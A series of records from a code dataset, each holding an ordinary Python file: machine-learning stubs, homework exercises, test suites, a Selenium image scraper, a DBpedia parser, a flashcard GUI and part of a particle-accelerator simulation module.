# so 
convert it, as a precaution\n        images = np.array(dataset.get_series(self.data_id))\n\n        f_dict = {}\n        f_dict[self.input_op] = images / 255.0  # scale 8-bit pixel values into [0, 1]\n\n        # it is one everywhere where non-zero, i.e. zero columns are masked out\n        f_dict[self.padding_masks] = \\\n            np.sum(np.sign(images), axis=3, keepdims=True)\n\n        f_dict[self.train_mode] = train\n        return f_dict\n","sub_path":"neuralmonkey/encoders/cnn_encoder.py","file_name":"cnn_encoder.py","file_ext":"py","file_size_in_byte":7443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"387889243","text":"from demo.Data_fetcher import Data_fetcher\n\n\nclass House_price_prediction:\n    price_list = []\n    area_list = []\n    training_data_file_path = \"\"\n\n    def __init__(self, file_path):\n        training_data = Data_fetcher.get_input(file_path)\n        self.area_list = training_data.area_list\n        self.price_list = training_data.price_list\n        self.training_data_file_path = file_path\n        print(self.area_list)\n        print(self.price_list)\n\n\n\n\n\nhouse_price_prediction = House_price_prediction(\"./house_pricing_linear_regression.csv\")\n\n\n","sub_path":"demo/linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"183392026","text":"\ndef distinct_ab(file_name_a, file_name_b):\n    str1 = []\n    str2 = []\n    str_dump = []\n    with open(\"{}\".format(file_name_a), 'r') as fa, \\\n            open(\"{}\".format(file_name_b), 'r') as fb, \\\n            open(\"不同的文件.txt\", 'w+') as fc,\\\n            open(\"相同的文件.txt\", 'w+') as fd:\n\n        # read the contents of A.txt into str1, line by line\n        for line in fa.readlines():\n            str1.append(line.replace(\"\\n\", ''))\n        # read the contents of B.txt into str2, line by line\n        for line in fb.readlines():\n            str2.append(line.replace(\"\\n\", ''))\n\n        # add the lines duplicated across the two files to str_dump\n        for i in str1:\n            if i in str2:\n                str_dump.append(i)\n\n        # merge the lines of the two files and deduplicate\n        str_all = set(str1 + str2)\n\n        # remove the duplicated lines from the deduplicated merged set;\n        # what remains are the non-repeating lines\n        for i in str_dump:\n            fd.write(i + '\\n')\n            if i in str_all:\n                str_all.remove(i)\n        # write the lines to the file\n        for i in list(str_all):\n            fc.write(i + '\\n')\n\n        print('提取{}文件和{}文件的不同文件成功'.format(file_name_a, file_name_b))\n\n\nif __name__ == '__main__':\n    print('******************程序开始********************')\n    print('本程序可以比较两个文件,并将不同的内容提取单独保存')\n    print(' ')\n    while True:\n        try:\n            print('请确保需要对比提取的两个文件与程序在同一目录')\n            a = str(input('请输入第一个文件名称和后缀并回车:'))\n            b = str(input('请输入第二个文件名称和后缀并回车:'))\n            distinct_ab(a, b)\n            print(' ')\n            print('***************程序结束*****************')\n            break\n        except :\n            print('文件不存在,输入有误,请重新输入!!!')\n            q = int(input('输入0退出程序,输入1继续:'))\n            if q == 0:\n                print(' ')\n                print('******************程序结束********************')\n                break\n            else:\n                continue\n","sub_path":"distinct.py","file_name":"distinct.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"560416600","text":"import random\n\n# print the sum of every 3rd, 5th and 9th element from 0 - 100\nfor i in (3, 5, 9):\n    print(sum(range(1, 101, i)))\n\n# 1 line\n# for n in (3, 5, 9): print(sum(range(1,101,n)))\n\n# There is a dict | key - whatever | value - 20 integer elements\n# | print the keys of the three largest values, in ascending order of the values\nmy_dict = dict((key, random.randint(0, 100)) for key in range(20))\nprint(my_dict)\n\nres = sorted(my_dict.items(),\n             key=lambda item: item[1], reverse=True)[:3:]\nfor k, _ in res:\n    
print(k)\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"137039908","text":"# pylint: disable=missing-docstring\nfrom decimal import Decimal\n\nfrom beancount.core import realization\nfrom flask import g\n\nfrom fava.core.accounts import AccountData\nfrom fava.core.inventory import CounterInventory\nfrom fava.core.tree import TreeNode\nfrom fava.template_filters import basename\nfrom fava.template_filters import collapse_account\nfrom fava.template_filters import format_currency\nfrom fava.template_filters import format_errormsg\nfrom fava.template_filters import get_or_create\nfrom fava.template_filters import remove_keys\nfrom fava.template_filters import should_show\n\n\ndef test_remove_keys() -> None:\n \"\"\"Dict keys get remove or return empty dict if None is given.\"\"\"\n assert remove_keys(None, []) == {}\n assert remove_keys({\"asdf\": 1}, [\"asdf\"]) == {}\n\n\ndef test_format_currency(app) -> None:\n with app.test_request_context(\"/long-example/\"):\n app.preprocess_request()\n assert format_currency(Decimal(\"2.12\")) == \"2.12\"\n assert format_currency(Decimal(\"2.13\"), invert=True) == \"-2.13\"\n\n\ndef test_basename():\n \"\"\"Get the basename of a file path.\"\"\"\n assert basename(__file__) == \"test_template_filters.py\"\n\n\ndef test_get_or_create(example_ledger):\n assert (\n get_or_create(example_ledger.root_account, \"\")\n == example_ledger.root_account\n )\n assert get_or_create(\n example_ledger.root_account, \"Expenses\"\n ) == realization.get(example_ledger.root_account, \"Expenses\")\n\n\ndef test_should_show(app):\n with app.test_request_context(\"/long-example/\"):\n app.preprocess_request()\n assert should_show(g.ledger.root_tree.get(\"\")) is True\n assert should_show(g.ledger.root_tree.get(\"Expenses\")) is True\n\n account = TreeNode(\"name\")\n assert should_show(account) is False\n account.balance_children = CounterInventory({(\"USD\", None): 9})\n assert should_show(account) is True\n with app.test_request_context(\"/long-example/income_statement/?time=2100\"):\n app.preprocess_request()\n assert not g.ledger.fava_options[\"show-accounts-with-zero-balance\"]\n assert should_show(g.ledger.root_tree.get(\"\")) is True\n assert should_show(g.ledger.root_tree.get(\"Expenses\")) is False\n\n\ndef test_format_errormsg(app):\n with app.test_request_context(\"/long-example/\"):\n app.preprocess_request()\n assert (\n format_errormsg(\"Test for 'Expenses:Acme:Cash': Test\")\n == 'Test for Expenses:Acme:Cash: Test'\n )\n assert (\n format_errormsg(\"Test Expenses:Acme:Cash Test\")\n == 'Test Expenses:Acme:Cash Test'\n )\n assert format_errormsg(\"Test: Test\") == \"Test: Test\"\n\n\ndef test_collapse_account(app, monkeypatch):\n with app.test_request_context(\"/long-example/\"):\n app.preprocess_request()\n\n monkeypatch.setitem(\n g.ledger.fava_options,\n \"collapse-pattern\",\n [\n \"^Assets:Stock$\",\n \"^Assets:Property:.*\",\n ],\n )\n g.ledger.accounts[\"Assets:Stock\"] = AccountData()\n g.ledger.accounts[\"Assets:Property\"] = AccountData()\n\n assert collapse_account(\"Assets:Cash\") is False\n assert collapse_account(\"Assets:Cash\") is False\n\n assert collapse_account(\"Assets:Stock\") is True\n assert collapse_account(\"Assets:Stock\") is True\n assert collapse_account(\"Assets:Stock\") is True\n\n assert collapse_account(\"Assets:Property\") is False\n assert collapse_account(\"Assets:Property:Real\") is 
True\n    assert collapse_account(\"Assets:Property:Real:Land\") is True\n","sub_path":"tests/test_template_filters.py","file_name":"test_template_filters.py","file_ext":"py","file_size_in_byte":3767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"161113735","text":"# Task 1:\n# Given a list filled with arbitrary integers, build a new list whose\n# elements are the square roots of the elements of the source list,\n# but only if the result of taking the root has no fractional part and\n# if such a root can be taken at all\n# Example: given [2, -5, 8, 9, -25, 25, 4], the result is [3, 5, 2]\nimport random\nimport math\n\nprint (\"Задача 1\")\n\n# The program generates a list of positive and negative random integers by itself.\n# The number of elements in the list is set randomly, from 1 to 20.\n# After that the task is solved according to the given condition.\n\nprint (\"Создание произвольного списка из целых чисел:\")\n\ngenerated_list = [2, -5, 8, 9, -25, 25, 4]\n\nprint (\"Поиск целочисленных квадратных корней элементов списка:\", generated_list)\n\nnew_list = []\n\nfor element in generated_list:\n    if element >= 0:\n        result = math.sqrt(element)\n        if result.is_integer():\n            new_list.append(int(result))\n\nif len(new_list) > 0:\n    print (new_list)\nelse:\n    print (\"Корней, удовлетворяющих условию задачи не найдено!\")\n\n# Task 2: Given a date in dd.mm.yyyy format, for example: 02.11.2013.\n# Your task is to print the date in words, for example: второе ноября 2013 года.\n# Declension may be neglected (2000 года, 2010 года)\n\nimport datetime\n\nprint (\"Задача 2\")\n\ndate_str = \"02.11.2013\"\nprint (\"Исходное значение:\", date_str)\n\ndate_split = date_str.split(\".\")\n\nday, month, year = date_split[0], date_split[1], date_split[2]\n\ndays = [\n    \"первое\",\n    \"второе\",\n    \"третье\",\n    \"четвертое\",\n    \"пятое\",\n    \"шестое\",\n    \"седьмое\",\n    \"восьмое\",\n    \"девятое\"\n]\n\ndays_1x = [\n    \"одиннадцатое\",\n    \"двенадцатое\",\n    \"тринадцатое\",\n    \"четырнадцатое\",\n    \"пятнадцатое\",\n    \"шестнадцатое\",\n    \"семнадцатое\",\n    \"восемнадцатое\",\n    \"девятнадцатое\"\n]\n\nresult = []\n\nday = int(day)\n\nif day == 10:\n    result.append(\"десятое\")\nelif day == 20:\n    result.append(\"двадцатое\")\nelif day == 30:\n    result.append(\"тридцатое\")\nelif day == 31:\n    result.append(\"тридцать \" + days[0])\nelif day < 10:\n    result.append(days[day-1])\nelif 10 < day < 20:\n    result.append(days_1x[day-11])\nelif 20 < day < 30:\n    result.append(\"Двадцать \" + days[day-21])\n\nmonths = [\n    \"января\",\n    \"февраля\",\n    \"марта\",\n    \"апреля\",\n    \"мая\",\n    \"июня\",\n    \"июля\",\n    \"августа\",\n    \"сентября\",\n    \"октября\",\n    \"ноября\",\n    \"декабря\"\n]\n\nmonth = int(month)\nresult.append((months[month-1]))\n\nresult.append(year)\nresult.append(\"года\")\n\nfor words in result:\n    print(words, end=' ')\n\nprint()\n\n
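# A compact alternative sketch for the branchy Task 2 day-name logic above;\n# the helper name is illustrative, nothing below is called, and it relies only\n# on the 'days' and 'days_1x' lists already defined in this file.\ndef day_to_words(day, days=days, days_1x=days_1x):\n    \"\"\"Return the Russian ordinal words for a day of month (1-31).\"\"\"\n    if day % 10 == 0:  # round tens have dedicated words\n        return {10: \"десятое\", 20: \"двадцатое\", 30: \"тридцатое\"}[day]\n    if day < 10:\n        return days[day - 1]\n    if 10 < day < 20:\n        return days_1x[day - 11]\n    tens = \"двадцать \" if day < 30 else \"тридцать \"  # covers 21-29 and 31\n    return tens + days[day % 10 - 1]\n\n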
# Task 3: Write an algorithm that fills a list with arbitrary integers\n# in the range from -100 to 100. The list must contain n elements.\n# Hint:\n# to get a random number, use the randint() function of the random module\n\nprint(\"Задача 3\")\nprint (\"Создание списка из произвольных целых чисел в диапазоне от -100 до 100:\")\n\ngenerated_list = []\n\nn = 10\n\nwhile len(generated_list) < n:\n    generated_list.append(random.randint(-100, 100))\n\nprint (\"{lst} содержит {size} элемент(ов)\".format(lst=generated_list, size=n))\n\n# Task 4: Given a list filled with arbitrary integers.\n# Build a new list whose elements are:\n# a) the non-repeating elements of the source list:\n# e.g., lst = [1, 2, 4, 5, 6, 2, 5, 2] should give lst2 = [1, 2, 4, 5, 6]\n# b) the elements of the source list that have no repetitions:\n# e.g., lst = [1, 2, 4, 5, 6, 2, 5, 2] should give lst2 = [1, 4, 6]\n\nprint(\"Задача 4\")\n\nlst = [1, 2, 4, 5, 6, 2, 5, 2]\nprint(\"Исходный список:\", lst)\nlst2 = list(set(lst))\nprint(\"Уникальные элементы:\", lst2)\n\n# Let me voice a concern about the wording of 4-a.\n# The element with value 2, which is present in the answer, is\n# a repeating element of the source list. Looking at the solution,\n# I understand that it is about applying set.\n\nlst2.clear()\n\nunique = set()\nduplicates = set()\n\nfor i in lst:\n    if i not in unique:\n        unique.add(i)\n    else:\n        duplicates.add(i)\n\nprint(\"Неповторяющиеся элементы:\", unique - duplicates)","sub_path":"lesson02/home_work/hw02_normal.py","file_name":"hw02_normal.py","file_ext":"py","file_size_in_byte":5736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"159821797","text":"from selenium import webdriver\nimport base64\n\nbrowser = webdriver.Chrome(\"C:/Users/Christian/Documents/MLML/nlp_animation_generator/SpriteData/chromedriver.exe\") #replace with .Firefox(), or with the browser of your choice\nurl = \"http://gaurav.munjal.us/Universal-LPC-Spritesheet-Character-Generator/#?sex=female&legs=sara&mail=chain\"\nbrowser.get(url)\ncanvas = browser.find_element_by_css_selector(\"#spritesheet\")\n# get the canvas as a PNG base64 string\ncanvas_base64 = browser.execute_script(\"return arguments[0].toDataURL('image/png').substring(21);\", canvas)\n\n# decode\ncanvas_png = base64.b64decode(canvas_base64)\n\n# save to a file\nwith open(r\"canvas.png\", 'wb') as f:\n    f.write(canvas_png)","sub_path":"SpriteData/examples/selenium_scraper.py","file_name":"selenium_scraper.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"129320274","text":"# Code edited by Victor Besse and Jean-Sébastien Sainte-Rose\r\n# after the last session on Wednesday, July 4, 2017\r\n# with the presence, help and support of the whole team\r\nimport xml.etree.ElementTree as ET\r\nimport re\r\n\r\n#Declaration of the NameSpaces for the search\r\nns = {\"owl\":\"http://www.w3.org/2002/07/owl#\",\"rdf\":\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\",\"rdfs\":\"http://www.w3.org/2000/01/rdf-schema#\"}\r\n\r\ntree = ET.parse('dbpedia_2016-04.xml')\r\n\r\n#gets the root of the file\r\nroot = tree.getroot()\r\n\r\n#get: accesses the element's attribute\r\n#find: accesses the element\r\n#Walks the tree to find the elements we are interested in\r\nsubClassOf_bool = False\r\nelems = tree.findall(\".//owl:Class\",ns)\r\nsousClasse = tree.findall(\".//rdfs:subClassOf\",ns)\r\nfileJson=open('./ClassesDbpedia.json','w')\r\nfor e in elems:\r\n    nom = e.get('about')\r\n    
nom = re.sub(\"/ontology/\",\"\", nom)\r\n Subclasses = e.findall(\".//rdfs:subClassOf\",ns)\r\n fileJson.write('{\"name\" : \"'+str(nom)+'\"')\r\n fileJson.write('')\r\n for Sc in Subclasses:\r\n if Sc!=None:\r\n stringSC=str(Sc.get('resource'))\r\n stringSC=re.sub(\"/ontology/\",\"\",stringSC)\r\n stringSC=re.sub(\"http://www.w3.org/2002/07/owl#\",\"\",stringSC)\r\n stringSC=re.sub(\"http://schema.org/\",\"\",stringSC)\r\n stringSC=re.sub(\"http://www.ontologydesignpatterns.org/ont/dul/DUL.owl#\",\"\",stringSC)\r\n if subClassOf_bool == False:\r\n subClassOf_bool = True\r\n fileJson.write(' , \"subClassOf\": [\"'+stringSC+'\"')\r\n else:\r\n fileJson.write(','+'\"'+stringSC+'\"')\r\n \r\n fileJson.write(']}\\n')\r\n print(subClassOf_bool)\r\n subClassOf_bool = False\r\n\r\n\r\n","sub_path":"parser/parseurDBPedia.py","file_name":"parseurDBPedia.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"280592082","text":"import matplotlib.pyplot as plt # standard abbreviation\n\n\nx = [2, 4, 6, 8, 10]\ny = [6, 7, 8, 2, 4]\n\nx2 = [1, 3, 5, 7, 9]\ny2 = [7, 8, 2, 4, 2]\n\n# plots bar graph with label (for legend) and colors (can use name, letter or hex colors)\nplt.bar(x, y, label='Bars1', color='r')\nplt.bar(x2, y2, label='Bars2', color='c')\n\npopulation_ages = [22, 55, 62, 25, 21, 2, 34, 42, 42, 4, 4, 99, 102, 110, 120, 121, 122, 130, 111, 115, 112, 80, 75, 65, 54, 44, 43, 42, 48]\n\nbins = [0, 20, 40, 60, 80, 100, 120]\n#plt.hist(population_ages, bins, histtype='bar', rwidth=0.8)\n#plt.show()\n\n\n# add x and y labels\nplt.xlabel('x')\nplt.ylabel('y')\n\n# adds title\nplt.title('Interesting Graph\\nCheck it out')\n\n# adds legend\nplt.legend()\n\n# Show plot\n#plt.show()\n\n\n\n\n","sub_path":"Matplotlib/BarChartAndHistogram.py","file_name":"BarChartAndHistogram.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"447518322","text":"import shutil\nimport os\nimport time\nimport re\nimport sys\nimport numpy as np\n\n\nclass ExprCreaterAndResumer:\n def __init__(self, rootdir, postfix=None):\n if not os.path.exists(rootdir):\n os.makedirs(rootdir)\n expr_dirs = os.listdir(rootdir)\n re_matches = [re.match(\"(\\d+)_\", x) for x in expr_dirs]\n expr_num = [int(x.group(1)) for x in re_matches if x is not None]\n highest_idx = np.argmax(expr_num) if len(expr_num) > 0 else -1\n\n # dir name is like \"5_Mar-09-12-27-59\" or \"5_\"\n self.dir = rootdir + '/' + '%02d' % (expr_num[highest_idx] + 1 if highest_idx != -1 else 0) + \\\n '_' + (postfix if postfix else time.strftime(\"%b-%d-%H-%M-%S\"))\n os.makedirs(self.dir)\n self.logfile = open(self.dir + \"/log.txt\", 'a') # no buffer\n self.redirect_output_to_logfile_as_well()\n\n def getLogDir(self):\n return self.dir\n\n def redirect_output_to_logfile_as_well(self):\n class Logger(object):\n def __init__(self, logfile):\n self.stdout = sys.stdout\n self.logfile = logfile\n\n def write(self, message):\n self.stdout.write(message)\n self.logfile.write(message)\n\n def flush(self):\n # this flush method is needed for python 3 compatibility.\n # this handles the flush command by doing nothing.\n # you might want to specify some extra behavior here.\n pass\n\n sys.stdout = Logger(self.logfile)\n sys.stderr = sys.stdout\n # Now you can use: `print \"Hello\"`, which will write \"Hello\" to both stdout and logfile\n\n def dump_src_code_and_model_def(self, fname):\n 
fname = os.path.abspath(fname) # if already absolute path, it does nothing\n shutil.copyfile(fname, self.dir + '/' + os.path.basename(fname))\n\n # copy all py files in current directory\n task_dir = fname.split('/')[-2] # this will give \"gaze\" \"modeling\" etc\n task_snapshot_dir = self.dir + '/all_py_files_snapshot/' + task_dir\n os.makedirs(task_snapshot_dir)\n task_py_files = [os.path.dirname(fname) + '/' + x for x in os.listdir(os.path.dirname(fname)) if\n x.endswith('.py')]\n for py in task_py_files:\n shutil.copyfile(py, task_snapshot_dir + '/' + os.path.basename(py))\n if '__init__.py' in py:\n shutil.copyfile(py, self.dir + '/all_py_files_snapshot/' + os.path.basename(py))\n\n","sub_path":"Week12/Experiment/experiment_saver/experiment_creater_and_resumer.py","file_name":"experiment_creater_and_resumer.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"19014573","text":"import sys\n\n# Check if argument was provided\n# Ensure definition of num_stairs\ndigit_string = sys.argv[1]\n\nif digit_string.isdigit():\n num_stairs = int(digit_string)\nelse:\n print(\"Natural number is expected!\")\n exit(1)\n\nfor i in range(num_stairs):\n print(\" \" * (num_stairs - (i + 1)) + \"#\" * (i + 1))\n","sub_path":"Week1/stairs.py","file_name":"stairs.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"28736830","text":"# (C) Datadog, Inc. 2020-present\n# All rights reserved\n# Licensed under a 3-clause BSD style license (see LICENSE)\nimport pytest\n\nfrom datadog_checks.couch import CouchDb\n\nfrom . import common\n\n\n@pytest.mark.usefixtures(\"dd_environment\")\ndef test_collect_metadata_instance(aggregator, datadog_agent, instance):\n check = CouchDb(common.CHECK_NAME, {}, [instance])\n check.check_id = common.CHECK_ID\n check.check(instance)\n version = common.COUCH_RAW_VERSION\n\n major, minor, patch = version.split('.')\n version_metadata = {\n 'version.raw': version,\n 'version.scheme': 'semver',\n 'version.major': major,\n 'version.minor': minor,\n 'version.patch': patch,\n }\n\n datadog_agent.assert_metadata(common.CHECK_ID, version_metadata)\n datadog_agent.assert_metadata_count(5)\n","sub_path":"couch/tests/test_couch.py","file_name":"test_couch.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"259453623","text":"import PySimpleGUI as gui\nimport os\nfrom models.CardSet import CardSet\nfrom models.Card import Card\nfrom util.saveFile import saveFile\nfrom util.findCardByMainColumn import findCardByMainColumn\nimport layout.Layout as Layout\nfrom windows import cardSetSettingsWindow, studyWindow\nfrom util.log.log import LogLevel, consoleLog\n\n\ndef init(cardSet: CardSet) -> None:\n\n currentCard: Card = Card()\n columns = cardSet.columns\n\n window = Layout.getMainWindow(cardSet)\n window.ElementJustification = 'center'\n\n while True:\n event, values = window.read()\n consoleLog(LogLevel.INFO, 'Event occured: ', f'{event}')\n\n if event == gui.WIN_CLOSED:\n break\n\n elif event == 'Open...':\n importPath = gui.popup_get_file(\n 'Open file', no_window=True, file_types=Layout.fileTypes)\n if importPath:\n cardSet = CardSet(filePath=importPath)\n # gets the main column from every card to display in listbox\n window['CARDLIST'].update(values=cardSet.cards)\n window.set_title(\n f'FloraStudy - 
{os.path.basename(importPath)}')\n\n        elif event == 'CARDLIST':\n            if values['CARDLIST']:\n                currentCard = values['CARDLIST'][0]\n\n                columns = cardSet.columns\n\n                for i, column in enumerate(columns):\n                    window[column.upper()].update(\n                        currentCard.values[columns[i]])\n\n                window['SAVEBUTTON'].update(disabled=False)\n\n        elif event == 'Save as...':\n            savePath = Layout.getSaveAsWindow()\n            if savePath:\n                saveFile(cardSet, savePath)\n\n        elif event == 'Save':\n            saveFile(cardSet, cardSet.originPath)\n\n        elif event == 'SAVEBUTTON':\n            newValues = {column: window[column.upper()].get()\n                         for column in columns}\n\n            if currentCard in cardSet.cards:\n                cardIndex = cardSet.cards.index(currentCard)\n\n                cardSet.updateCard(newValues, cardIndex)\n                window['CARDLIST'].update(values=cardSet.cards)\n\n                saveFile(cardSet, cardSet.originPath)\n                consoleLog(LogLevel.SUCCESS,\n                           'Saved card to file ', f'{currentCard}')\n\n        elif event == 'STUDYBUTTON':\n            studyWindow.init(cardSet)\n\n        elif event == 'CARDSETSETTINGSBUTTON':\n            cardSet = cardSetSettingsWindow.init(cardSet)\n","sub_path":"windows/mainWindow.py","file_name":"mainWindow.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"189148945","text":"# encoding: UTF-8\n\n\"\"\"Library for running an EPICS-based virtual accelerator using FLAME envelope tracker.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport logging\nimport math\nimport os.path\nimport random\nimport re\nimport shutil\nimport subprocess\nimport tempfile\nimport time\nfrom collections import OrderedDict\nfrom copy import deepcopy\n\ntry:\n    from StringIO import StringIO\nexcept ImportError:\n    from io import StringIO\n\nimport cothread\nfrom flame import Machine\n\nfrom phantasy.library.pv import Popen\nfrom phantasy.library.pv import catools\nfrom phantasy.library.parser import Configuration\nfrom phantasy.library.layout import SeqElement\nfrom phantasy.library.layout import CavityElement\nfrom phantasy.library.layout import SolCorElement\nfrom phantasy.library.layout import CorElement\nfrom phantasy.library.layout import QuadElement\nfrom phantasy.library.layout import BendElement\nfrom phantasy.library.layout import SextElement\nfrom phantasy.library.layout import StripElement\nfrom phantasy.library.layout import BPMElement\nfrom phantasy.library.layout import PMElement\nfrom phantasy.library.layout import BLElement\nfrom phantasy.library.layout import BCMElement\nfrom phantasy.library.layout import BLMElement\nfrom phantasy.library.layout import ValveElement\nfrom phantasy.library.layout import PortElement\nfrom phantasy.library.layout import DriftElement\nfrom phantasy.library.layout import EQuadElement\nfrom phantasy.library.layout import EBendElement\nfrom phantasy.library.layout import EMSElement\nfrom phantasy.library.layout import SolElement\nfrom phantasy.library.layout import VDElement\nfrom phantasy.library.layout import FCElement\nfrom phantasy.library.layout import ElectrodeElement\nfrom phantasy.library.layout import SlitElement\nfrom phantasy.library.layout import ChopperElement\nfrom phantasy.library.layout import AttenuatorElement\nfrom phantasy.library.layout import DumpElement\nfrom phantasy.library.layout import ApertureElement\nfrom phantasy.library.lattice import FlameLatticeFactory\n\n\ntry:\n    basestring  # Python 2.X\nexcept NameError:\n    basestring = str  # Python 3.X\n\n\n# 
 +{"seq_id":"189148945","text":"# encoding: UTF-8\n\n\"\"\"Library for running an EPICS-based virtual accelerator using FLAME envelope tracker.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport logging\nimport math\nimport os.path\nimport random\nimport re\nimport shutil\nimport subprocess\nimport tempfile\nimport time\nfrom collections import OrderedDict\nfrom copy import deepcopy\n\ntry:\n from StringIO import StringIO\nexcept ImportError:\n from io import StringIO\n\nimport cothread\nfrom flame import Machine\n\nfrom phantasy.library.pv import Popen\nfrom phantasy.library.pv import catools\nfrom phantasy.library.parser import Configuration\nfrom phantasy.library.layout import SeqElement\nfrom phantasy.library.layout import CavityElement\nfrom phantasy.library.layout import SolCorElement\nfrom phantasy.library.layout import CorElement\nfrom phantasy.library.layout import QuadElement\nfrom phantasy.library.layout import BendElement\nfrom phantasy.library.layout import SextElement\nfrom phantasy.library.layout import StripElement\nfrom phantasy.library.layout import BPMElement\nfrom phantasy.library.layout import PMElement\nfrom phantasy.library.layout import BLElement\nfrom phantasy.library.layout import BCMElement\nfrom phantasy.library.layout import BLMElement\nfrom phantasy.library.layout import ValveElement\nfrom phantasy.library.layout import PortElement\nfrom phantasy.library.layout import DriftElement\nfrom phantasy.library.layout import EQuadElement\nfrom phantasy.library.layout import EBendElement\nfrom phantasy.library.layout import EMSElement\nfrom phantasy.library.layout import SolElement\nfrom phantasy.library.layout import VDElement\nfrom phantasy.library.layout import FCElement\nfrom phantasy.library.layout import ElectrodeElement\nfrom phantasy.library.layout import SlitElement\nfrom phantasy.library.layout import ChopperElement\nfrom phantasy.library.layout import AttenuatorElement\nfrom phantasy.library.layout import DumpElement\nfrom phantasy.library.layout import ApertureElement\nfrom phantasy.library.lattice import FlameLatticeFactory\n\n\ntry:\n basestring # Python 2.X\nexcept NameError:\n basestring = str # Python 3.X\n\n\n# configuration options\n\nCONFIG_MACHINE = \"machine\"\nCONFIG_FLAME_DATA_DIR = \"flame_data_dir\"\n\n# drift mask: bool\nCONFIG_DRIFT_MASK = \"drift_mask\"\n\n# default values\n\n_TEMP_DIRECTORY_SUFFIX = \"_va_flame\"\n\n# _DEFAULT_ERROR_VALUE = 0.0\n\n_VA_STATUS_GOOD = \"OK\"\n_VA_STATUS_BAD = \"ERR\"\n\n# global logger instance\n\n_LOGGER = logging.getLogger(__name__)\n\n# global virtual accelerator\n\n_VIRTUAL_ACCELERATOR = None\n\n\ndef start(layout, **kwargs):\n \"\"\"Start the global virtual accelerator.\n\n Parameters\n ----------\n layout :\n Accelerator layout object.\n\n Keyword Arguments\n -----------------\n settings :\n Dictionary of machine settings.\n channels :\n List of channel tuples with (name, properties, tags).\n start :\n Name of accelerator element to start simulation.\n end :\n Name of accelerator element to end simulation.\n data_dir :\n Path of directory containing FLAME data files.\n work_dir :\n Path of directory for execution of FLAME.\n \"\"\"\n\n global _VIRTUAL_ACCELERATOR\n if _VIRTUAL_ACCELERATOR is None:\n _VIRTUAL_ACCELERATOR = build_virtaccel(layout, **kwargs)\n\n if _VIRTUAL_ACCELERATOR.is_started():\n raise RuntimeError(\"Virtual Accelerator already started\")\n\n _VIRTUAL_ACCELERATOR.start()\n\n\ndef stop():\n \"\"\"Stop the global virtual accelerator.\n \"\"\"\n global _VIRTUAL_ACCELERATOR\n if _VIRTUAL_ACCELERATOR is None or not _VIRTUAL_ACCELERATOR.is_started():\n raise RuntimeError(\"Virtual Accelerator not started\")\n\n _VIRTUAL_ACCELERATOR.stop()\n\n\ndef build_virtaccel(layout, **kwargs):\n \"\"\"Convenience method to build a virtual accelerator.\n\n Parameters\n ----------\n layout :\n Accelerator layout object.\n\n Keyword Arguments\n -----------------\n settings :\n Dictionary of machine settings.\n channels :\n List of channel tuples with (name, properties, tags).\n start :\n Name of accelerator element to start simulation.\n end :\n Name of accelerator element to end simulation.\n data_dir :\n Path of directory containing FLAME data files.\n work_dir :\n Path of directory for execution of FLAME.\n\n Returns\n -------\n ret :\n VirtualAccelerator instance.\n \"\"\"\n va_factory = VirtualAcceleratorFactory(layout, **kwargs)\n\n return va_factory.build()\n\n\nclass VirtualAcceleratorFactory(object):\n \"\"\"Prepare a VirtualAccelerator for execution.\n\n The main purpose of this class is to process the accelerator\n description and configure the VirtualAccelerator for proper\n execution.\n \"\"\"\n def __init__(self, layout, **kwargs):\n self.layout = layout\n self.config = kwargs.get(\"config\", None)\n self.settings = kwargs.get(\"settings\", None)\n self.channels = kwargs.get(\"channels\", None)\n self.start = kwargs.get(\"start\", None)\n self.end = kwargs.get(\"end\", None)\n self.data_dir = kwargs.get(\"data_dir\", None)\n self.work_dir = kwargs.get(\"work_dir\", None)\n\n @property\n def layout(self):\n return self._layout\n\n @layout.setter\n def layout(self, layout):\n if not isinstance(layout, SeqElement):\n raise TypeError(\"VirtAccelFactory: 'layout' property must be type SeqElement\")\n self._layout = layout\n\n @property\n def start(self):\n return self._start\n\n @start.setter\n def start(self, start):\n if (start is not None) and not isinstance(start, basestring):\n raise TypeError(\"VirtAccelFactory: 'start' property must be type string or None\")\n self._start = start\n\n @property\n def end(self):\n return self._end\n\n @end.setter\n def end(self, end):\n if (end is not None) and not isinstance(end, basestring):\n raise TypeError(\"VirtAccelFactory: 'end' property must be type string or None\")\n self._end = end\n\n 
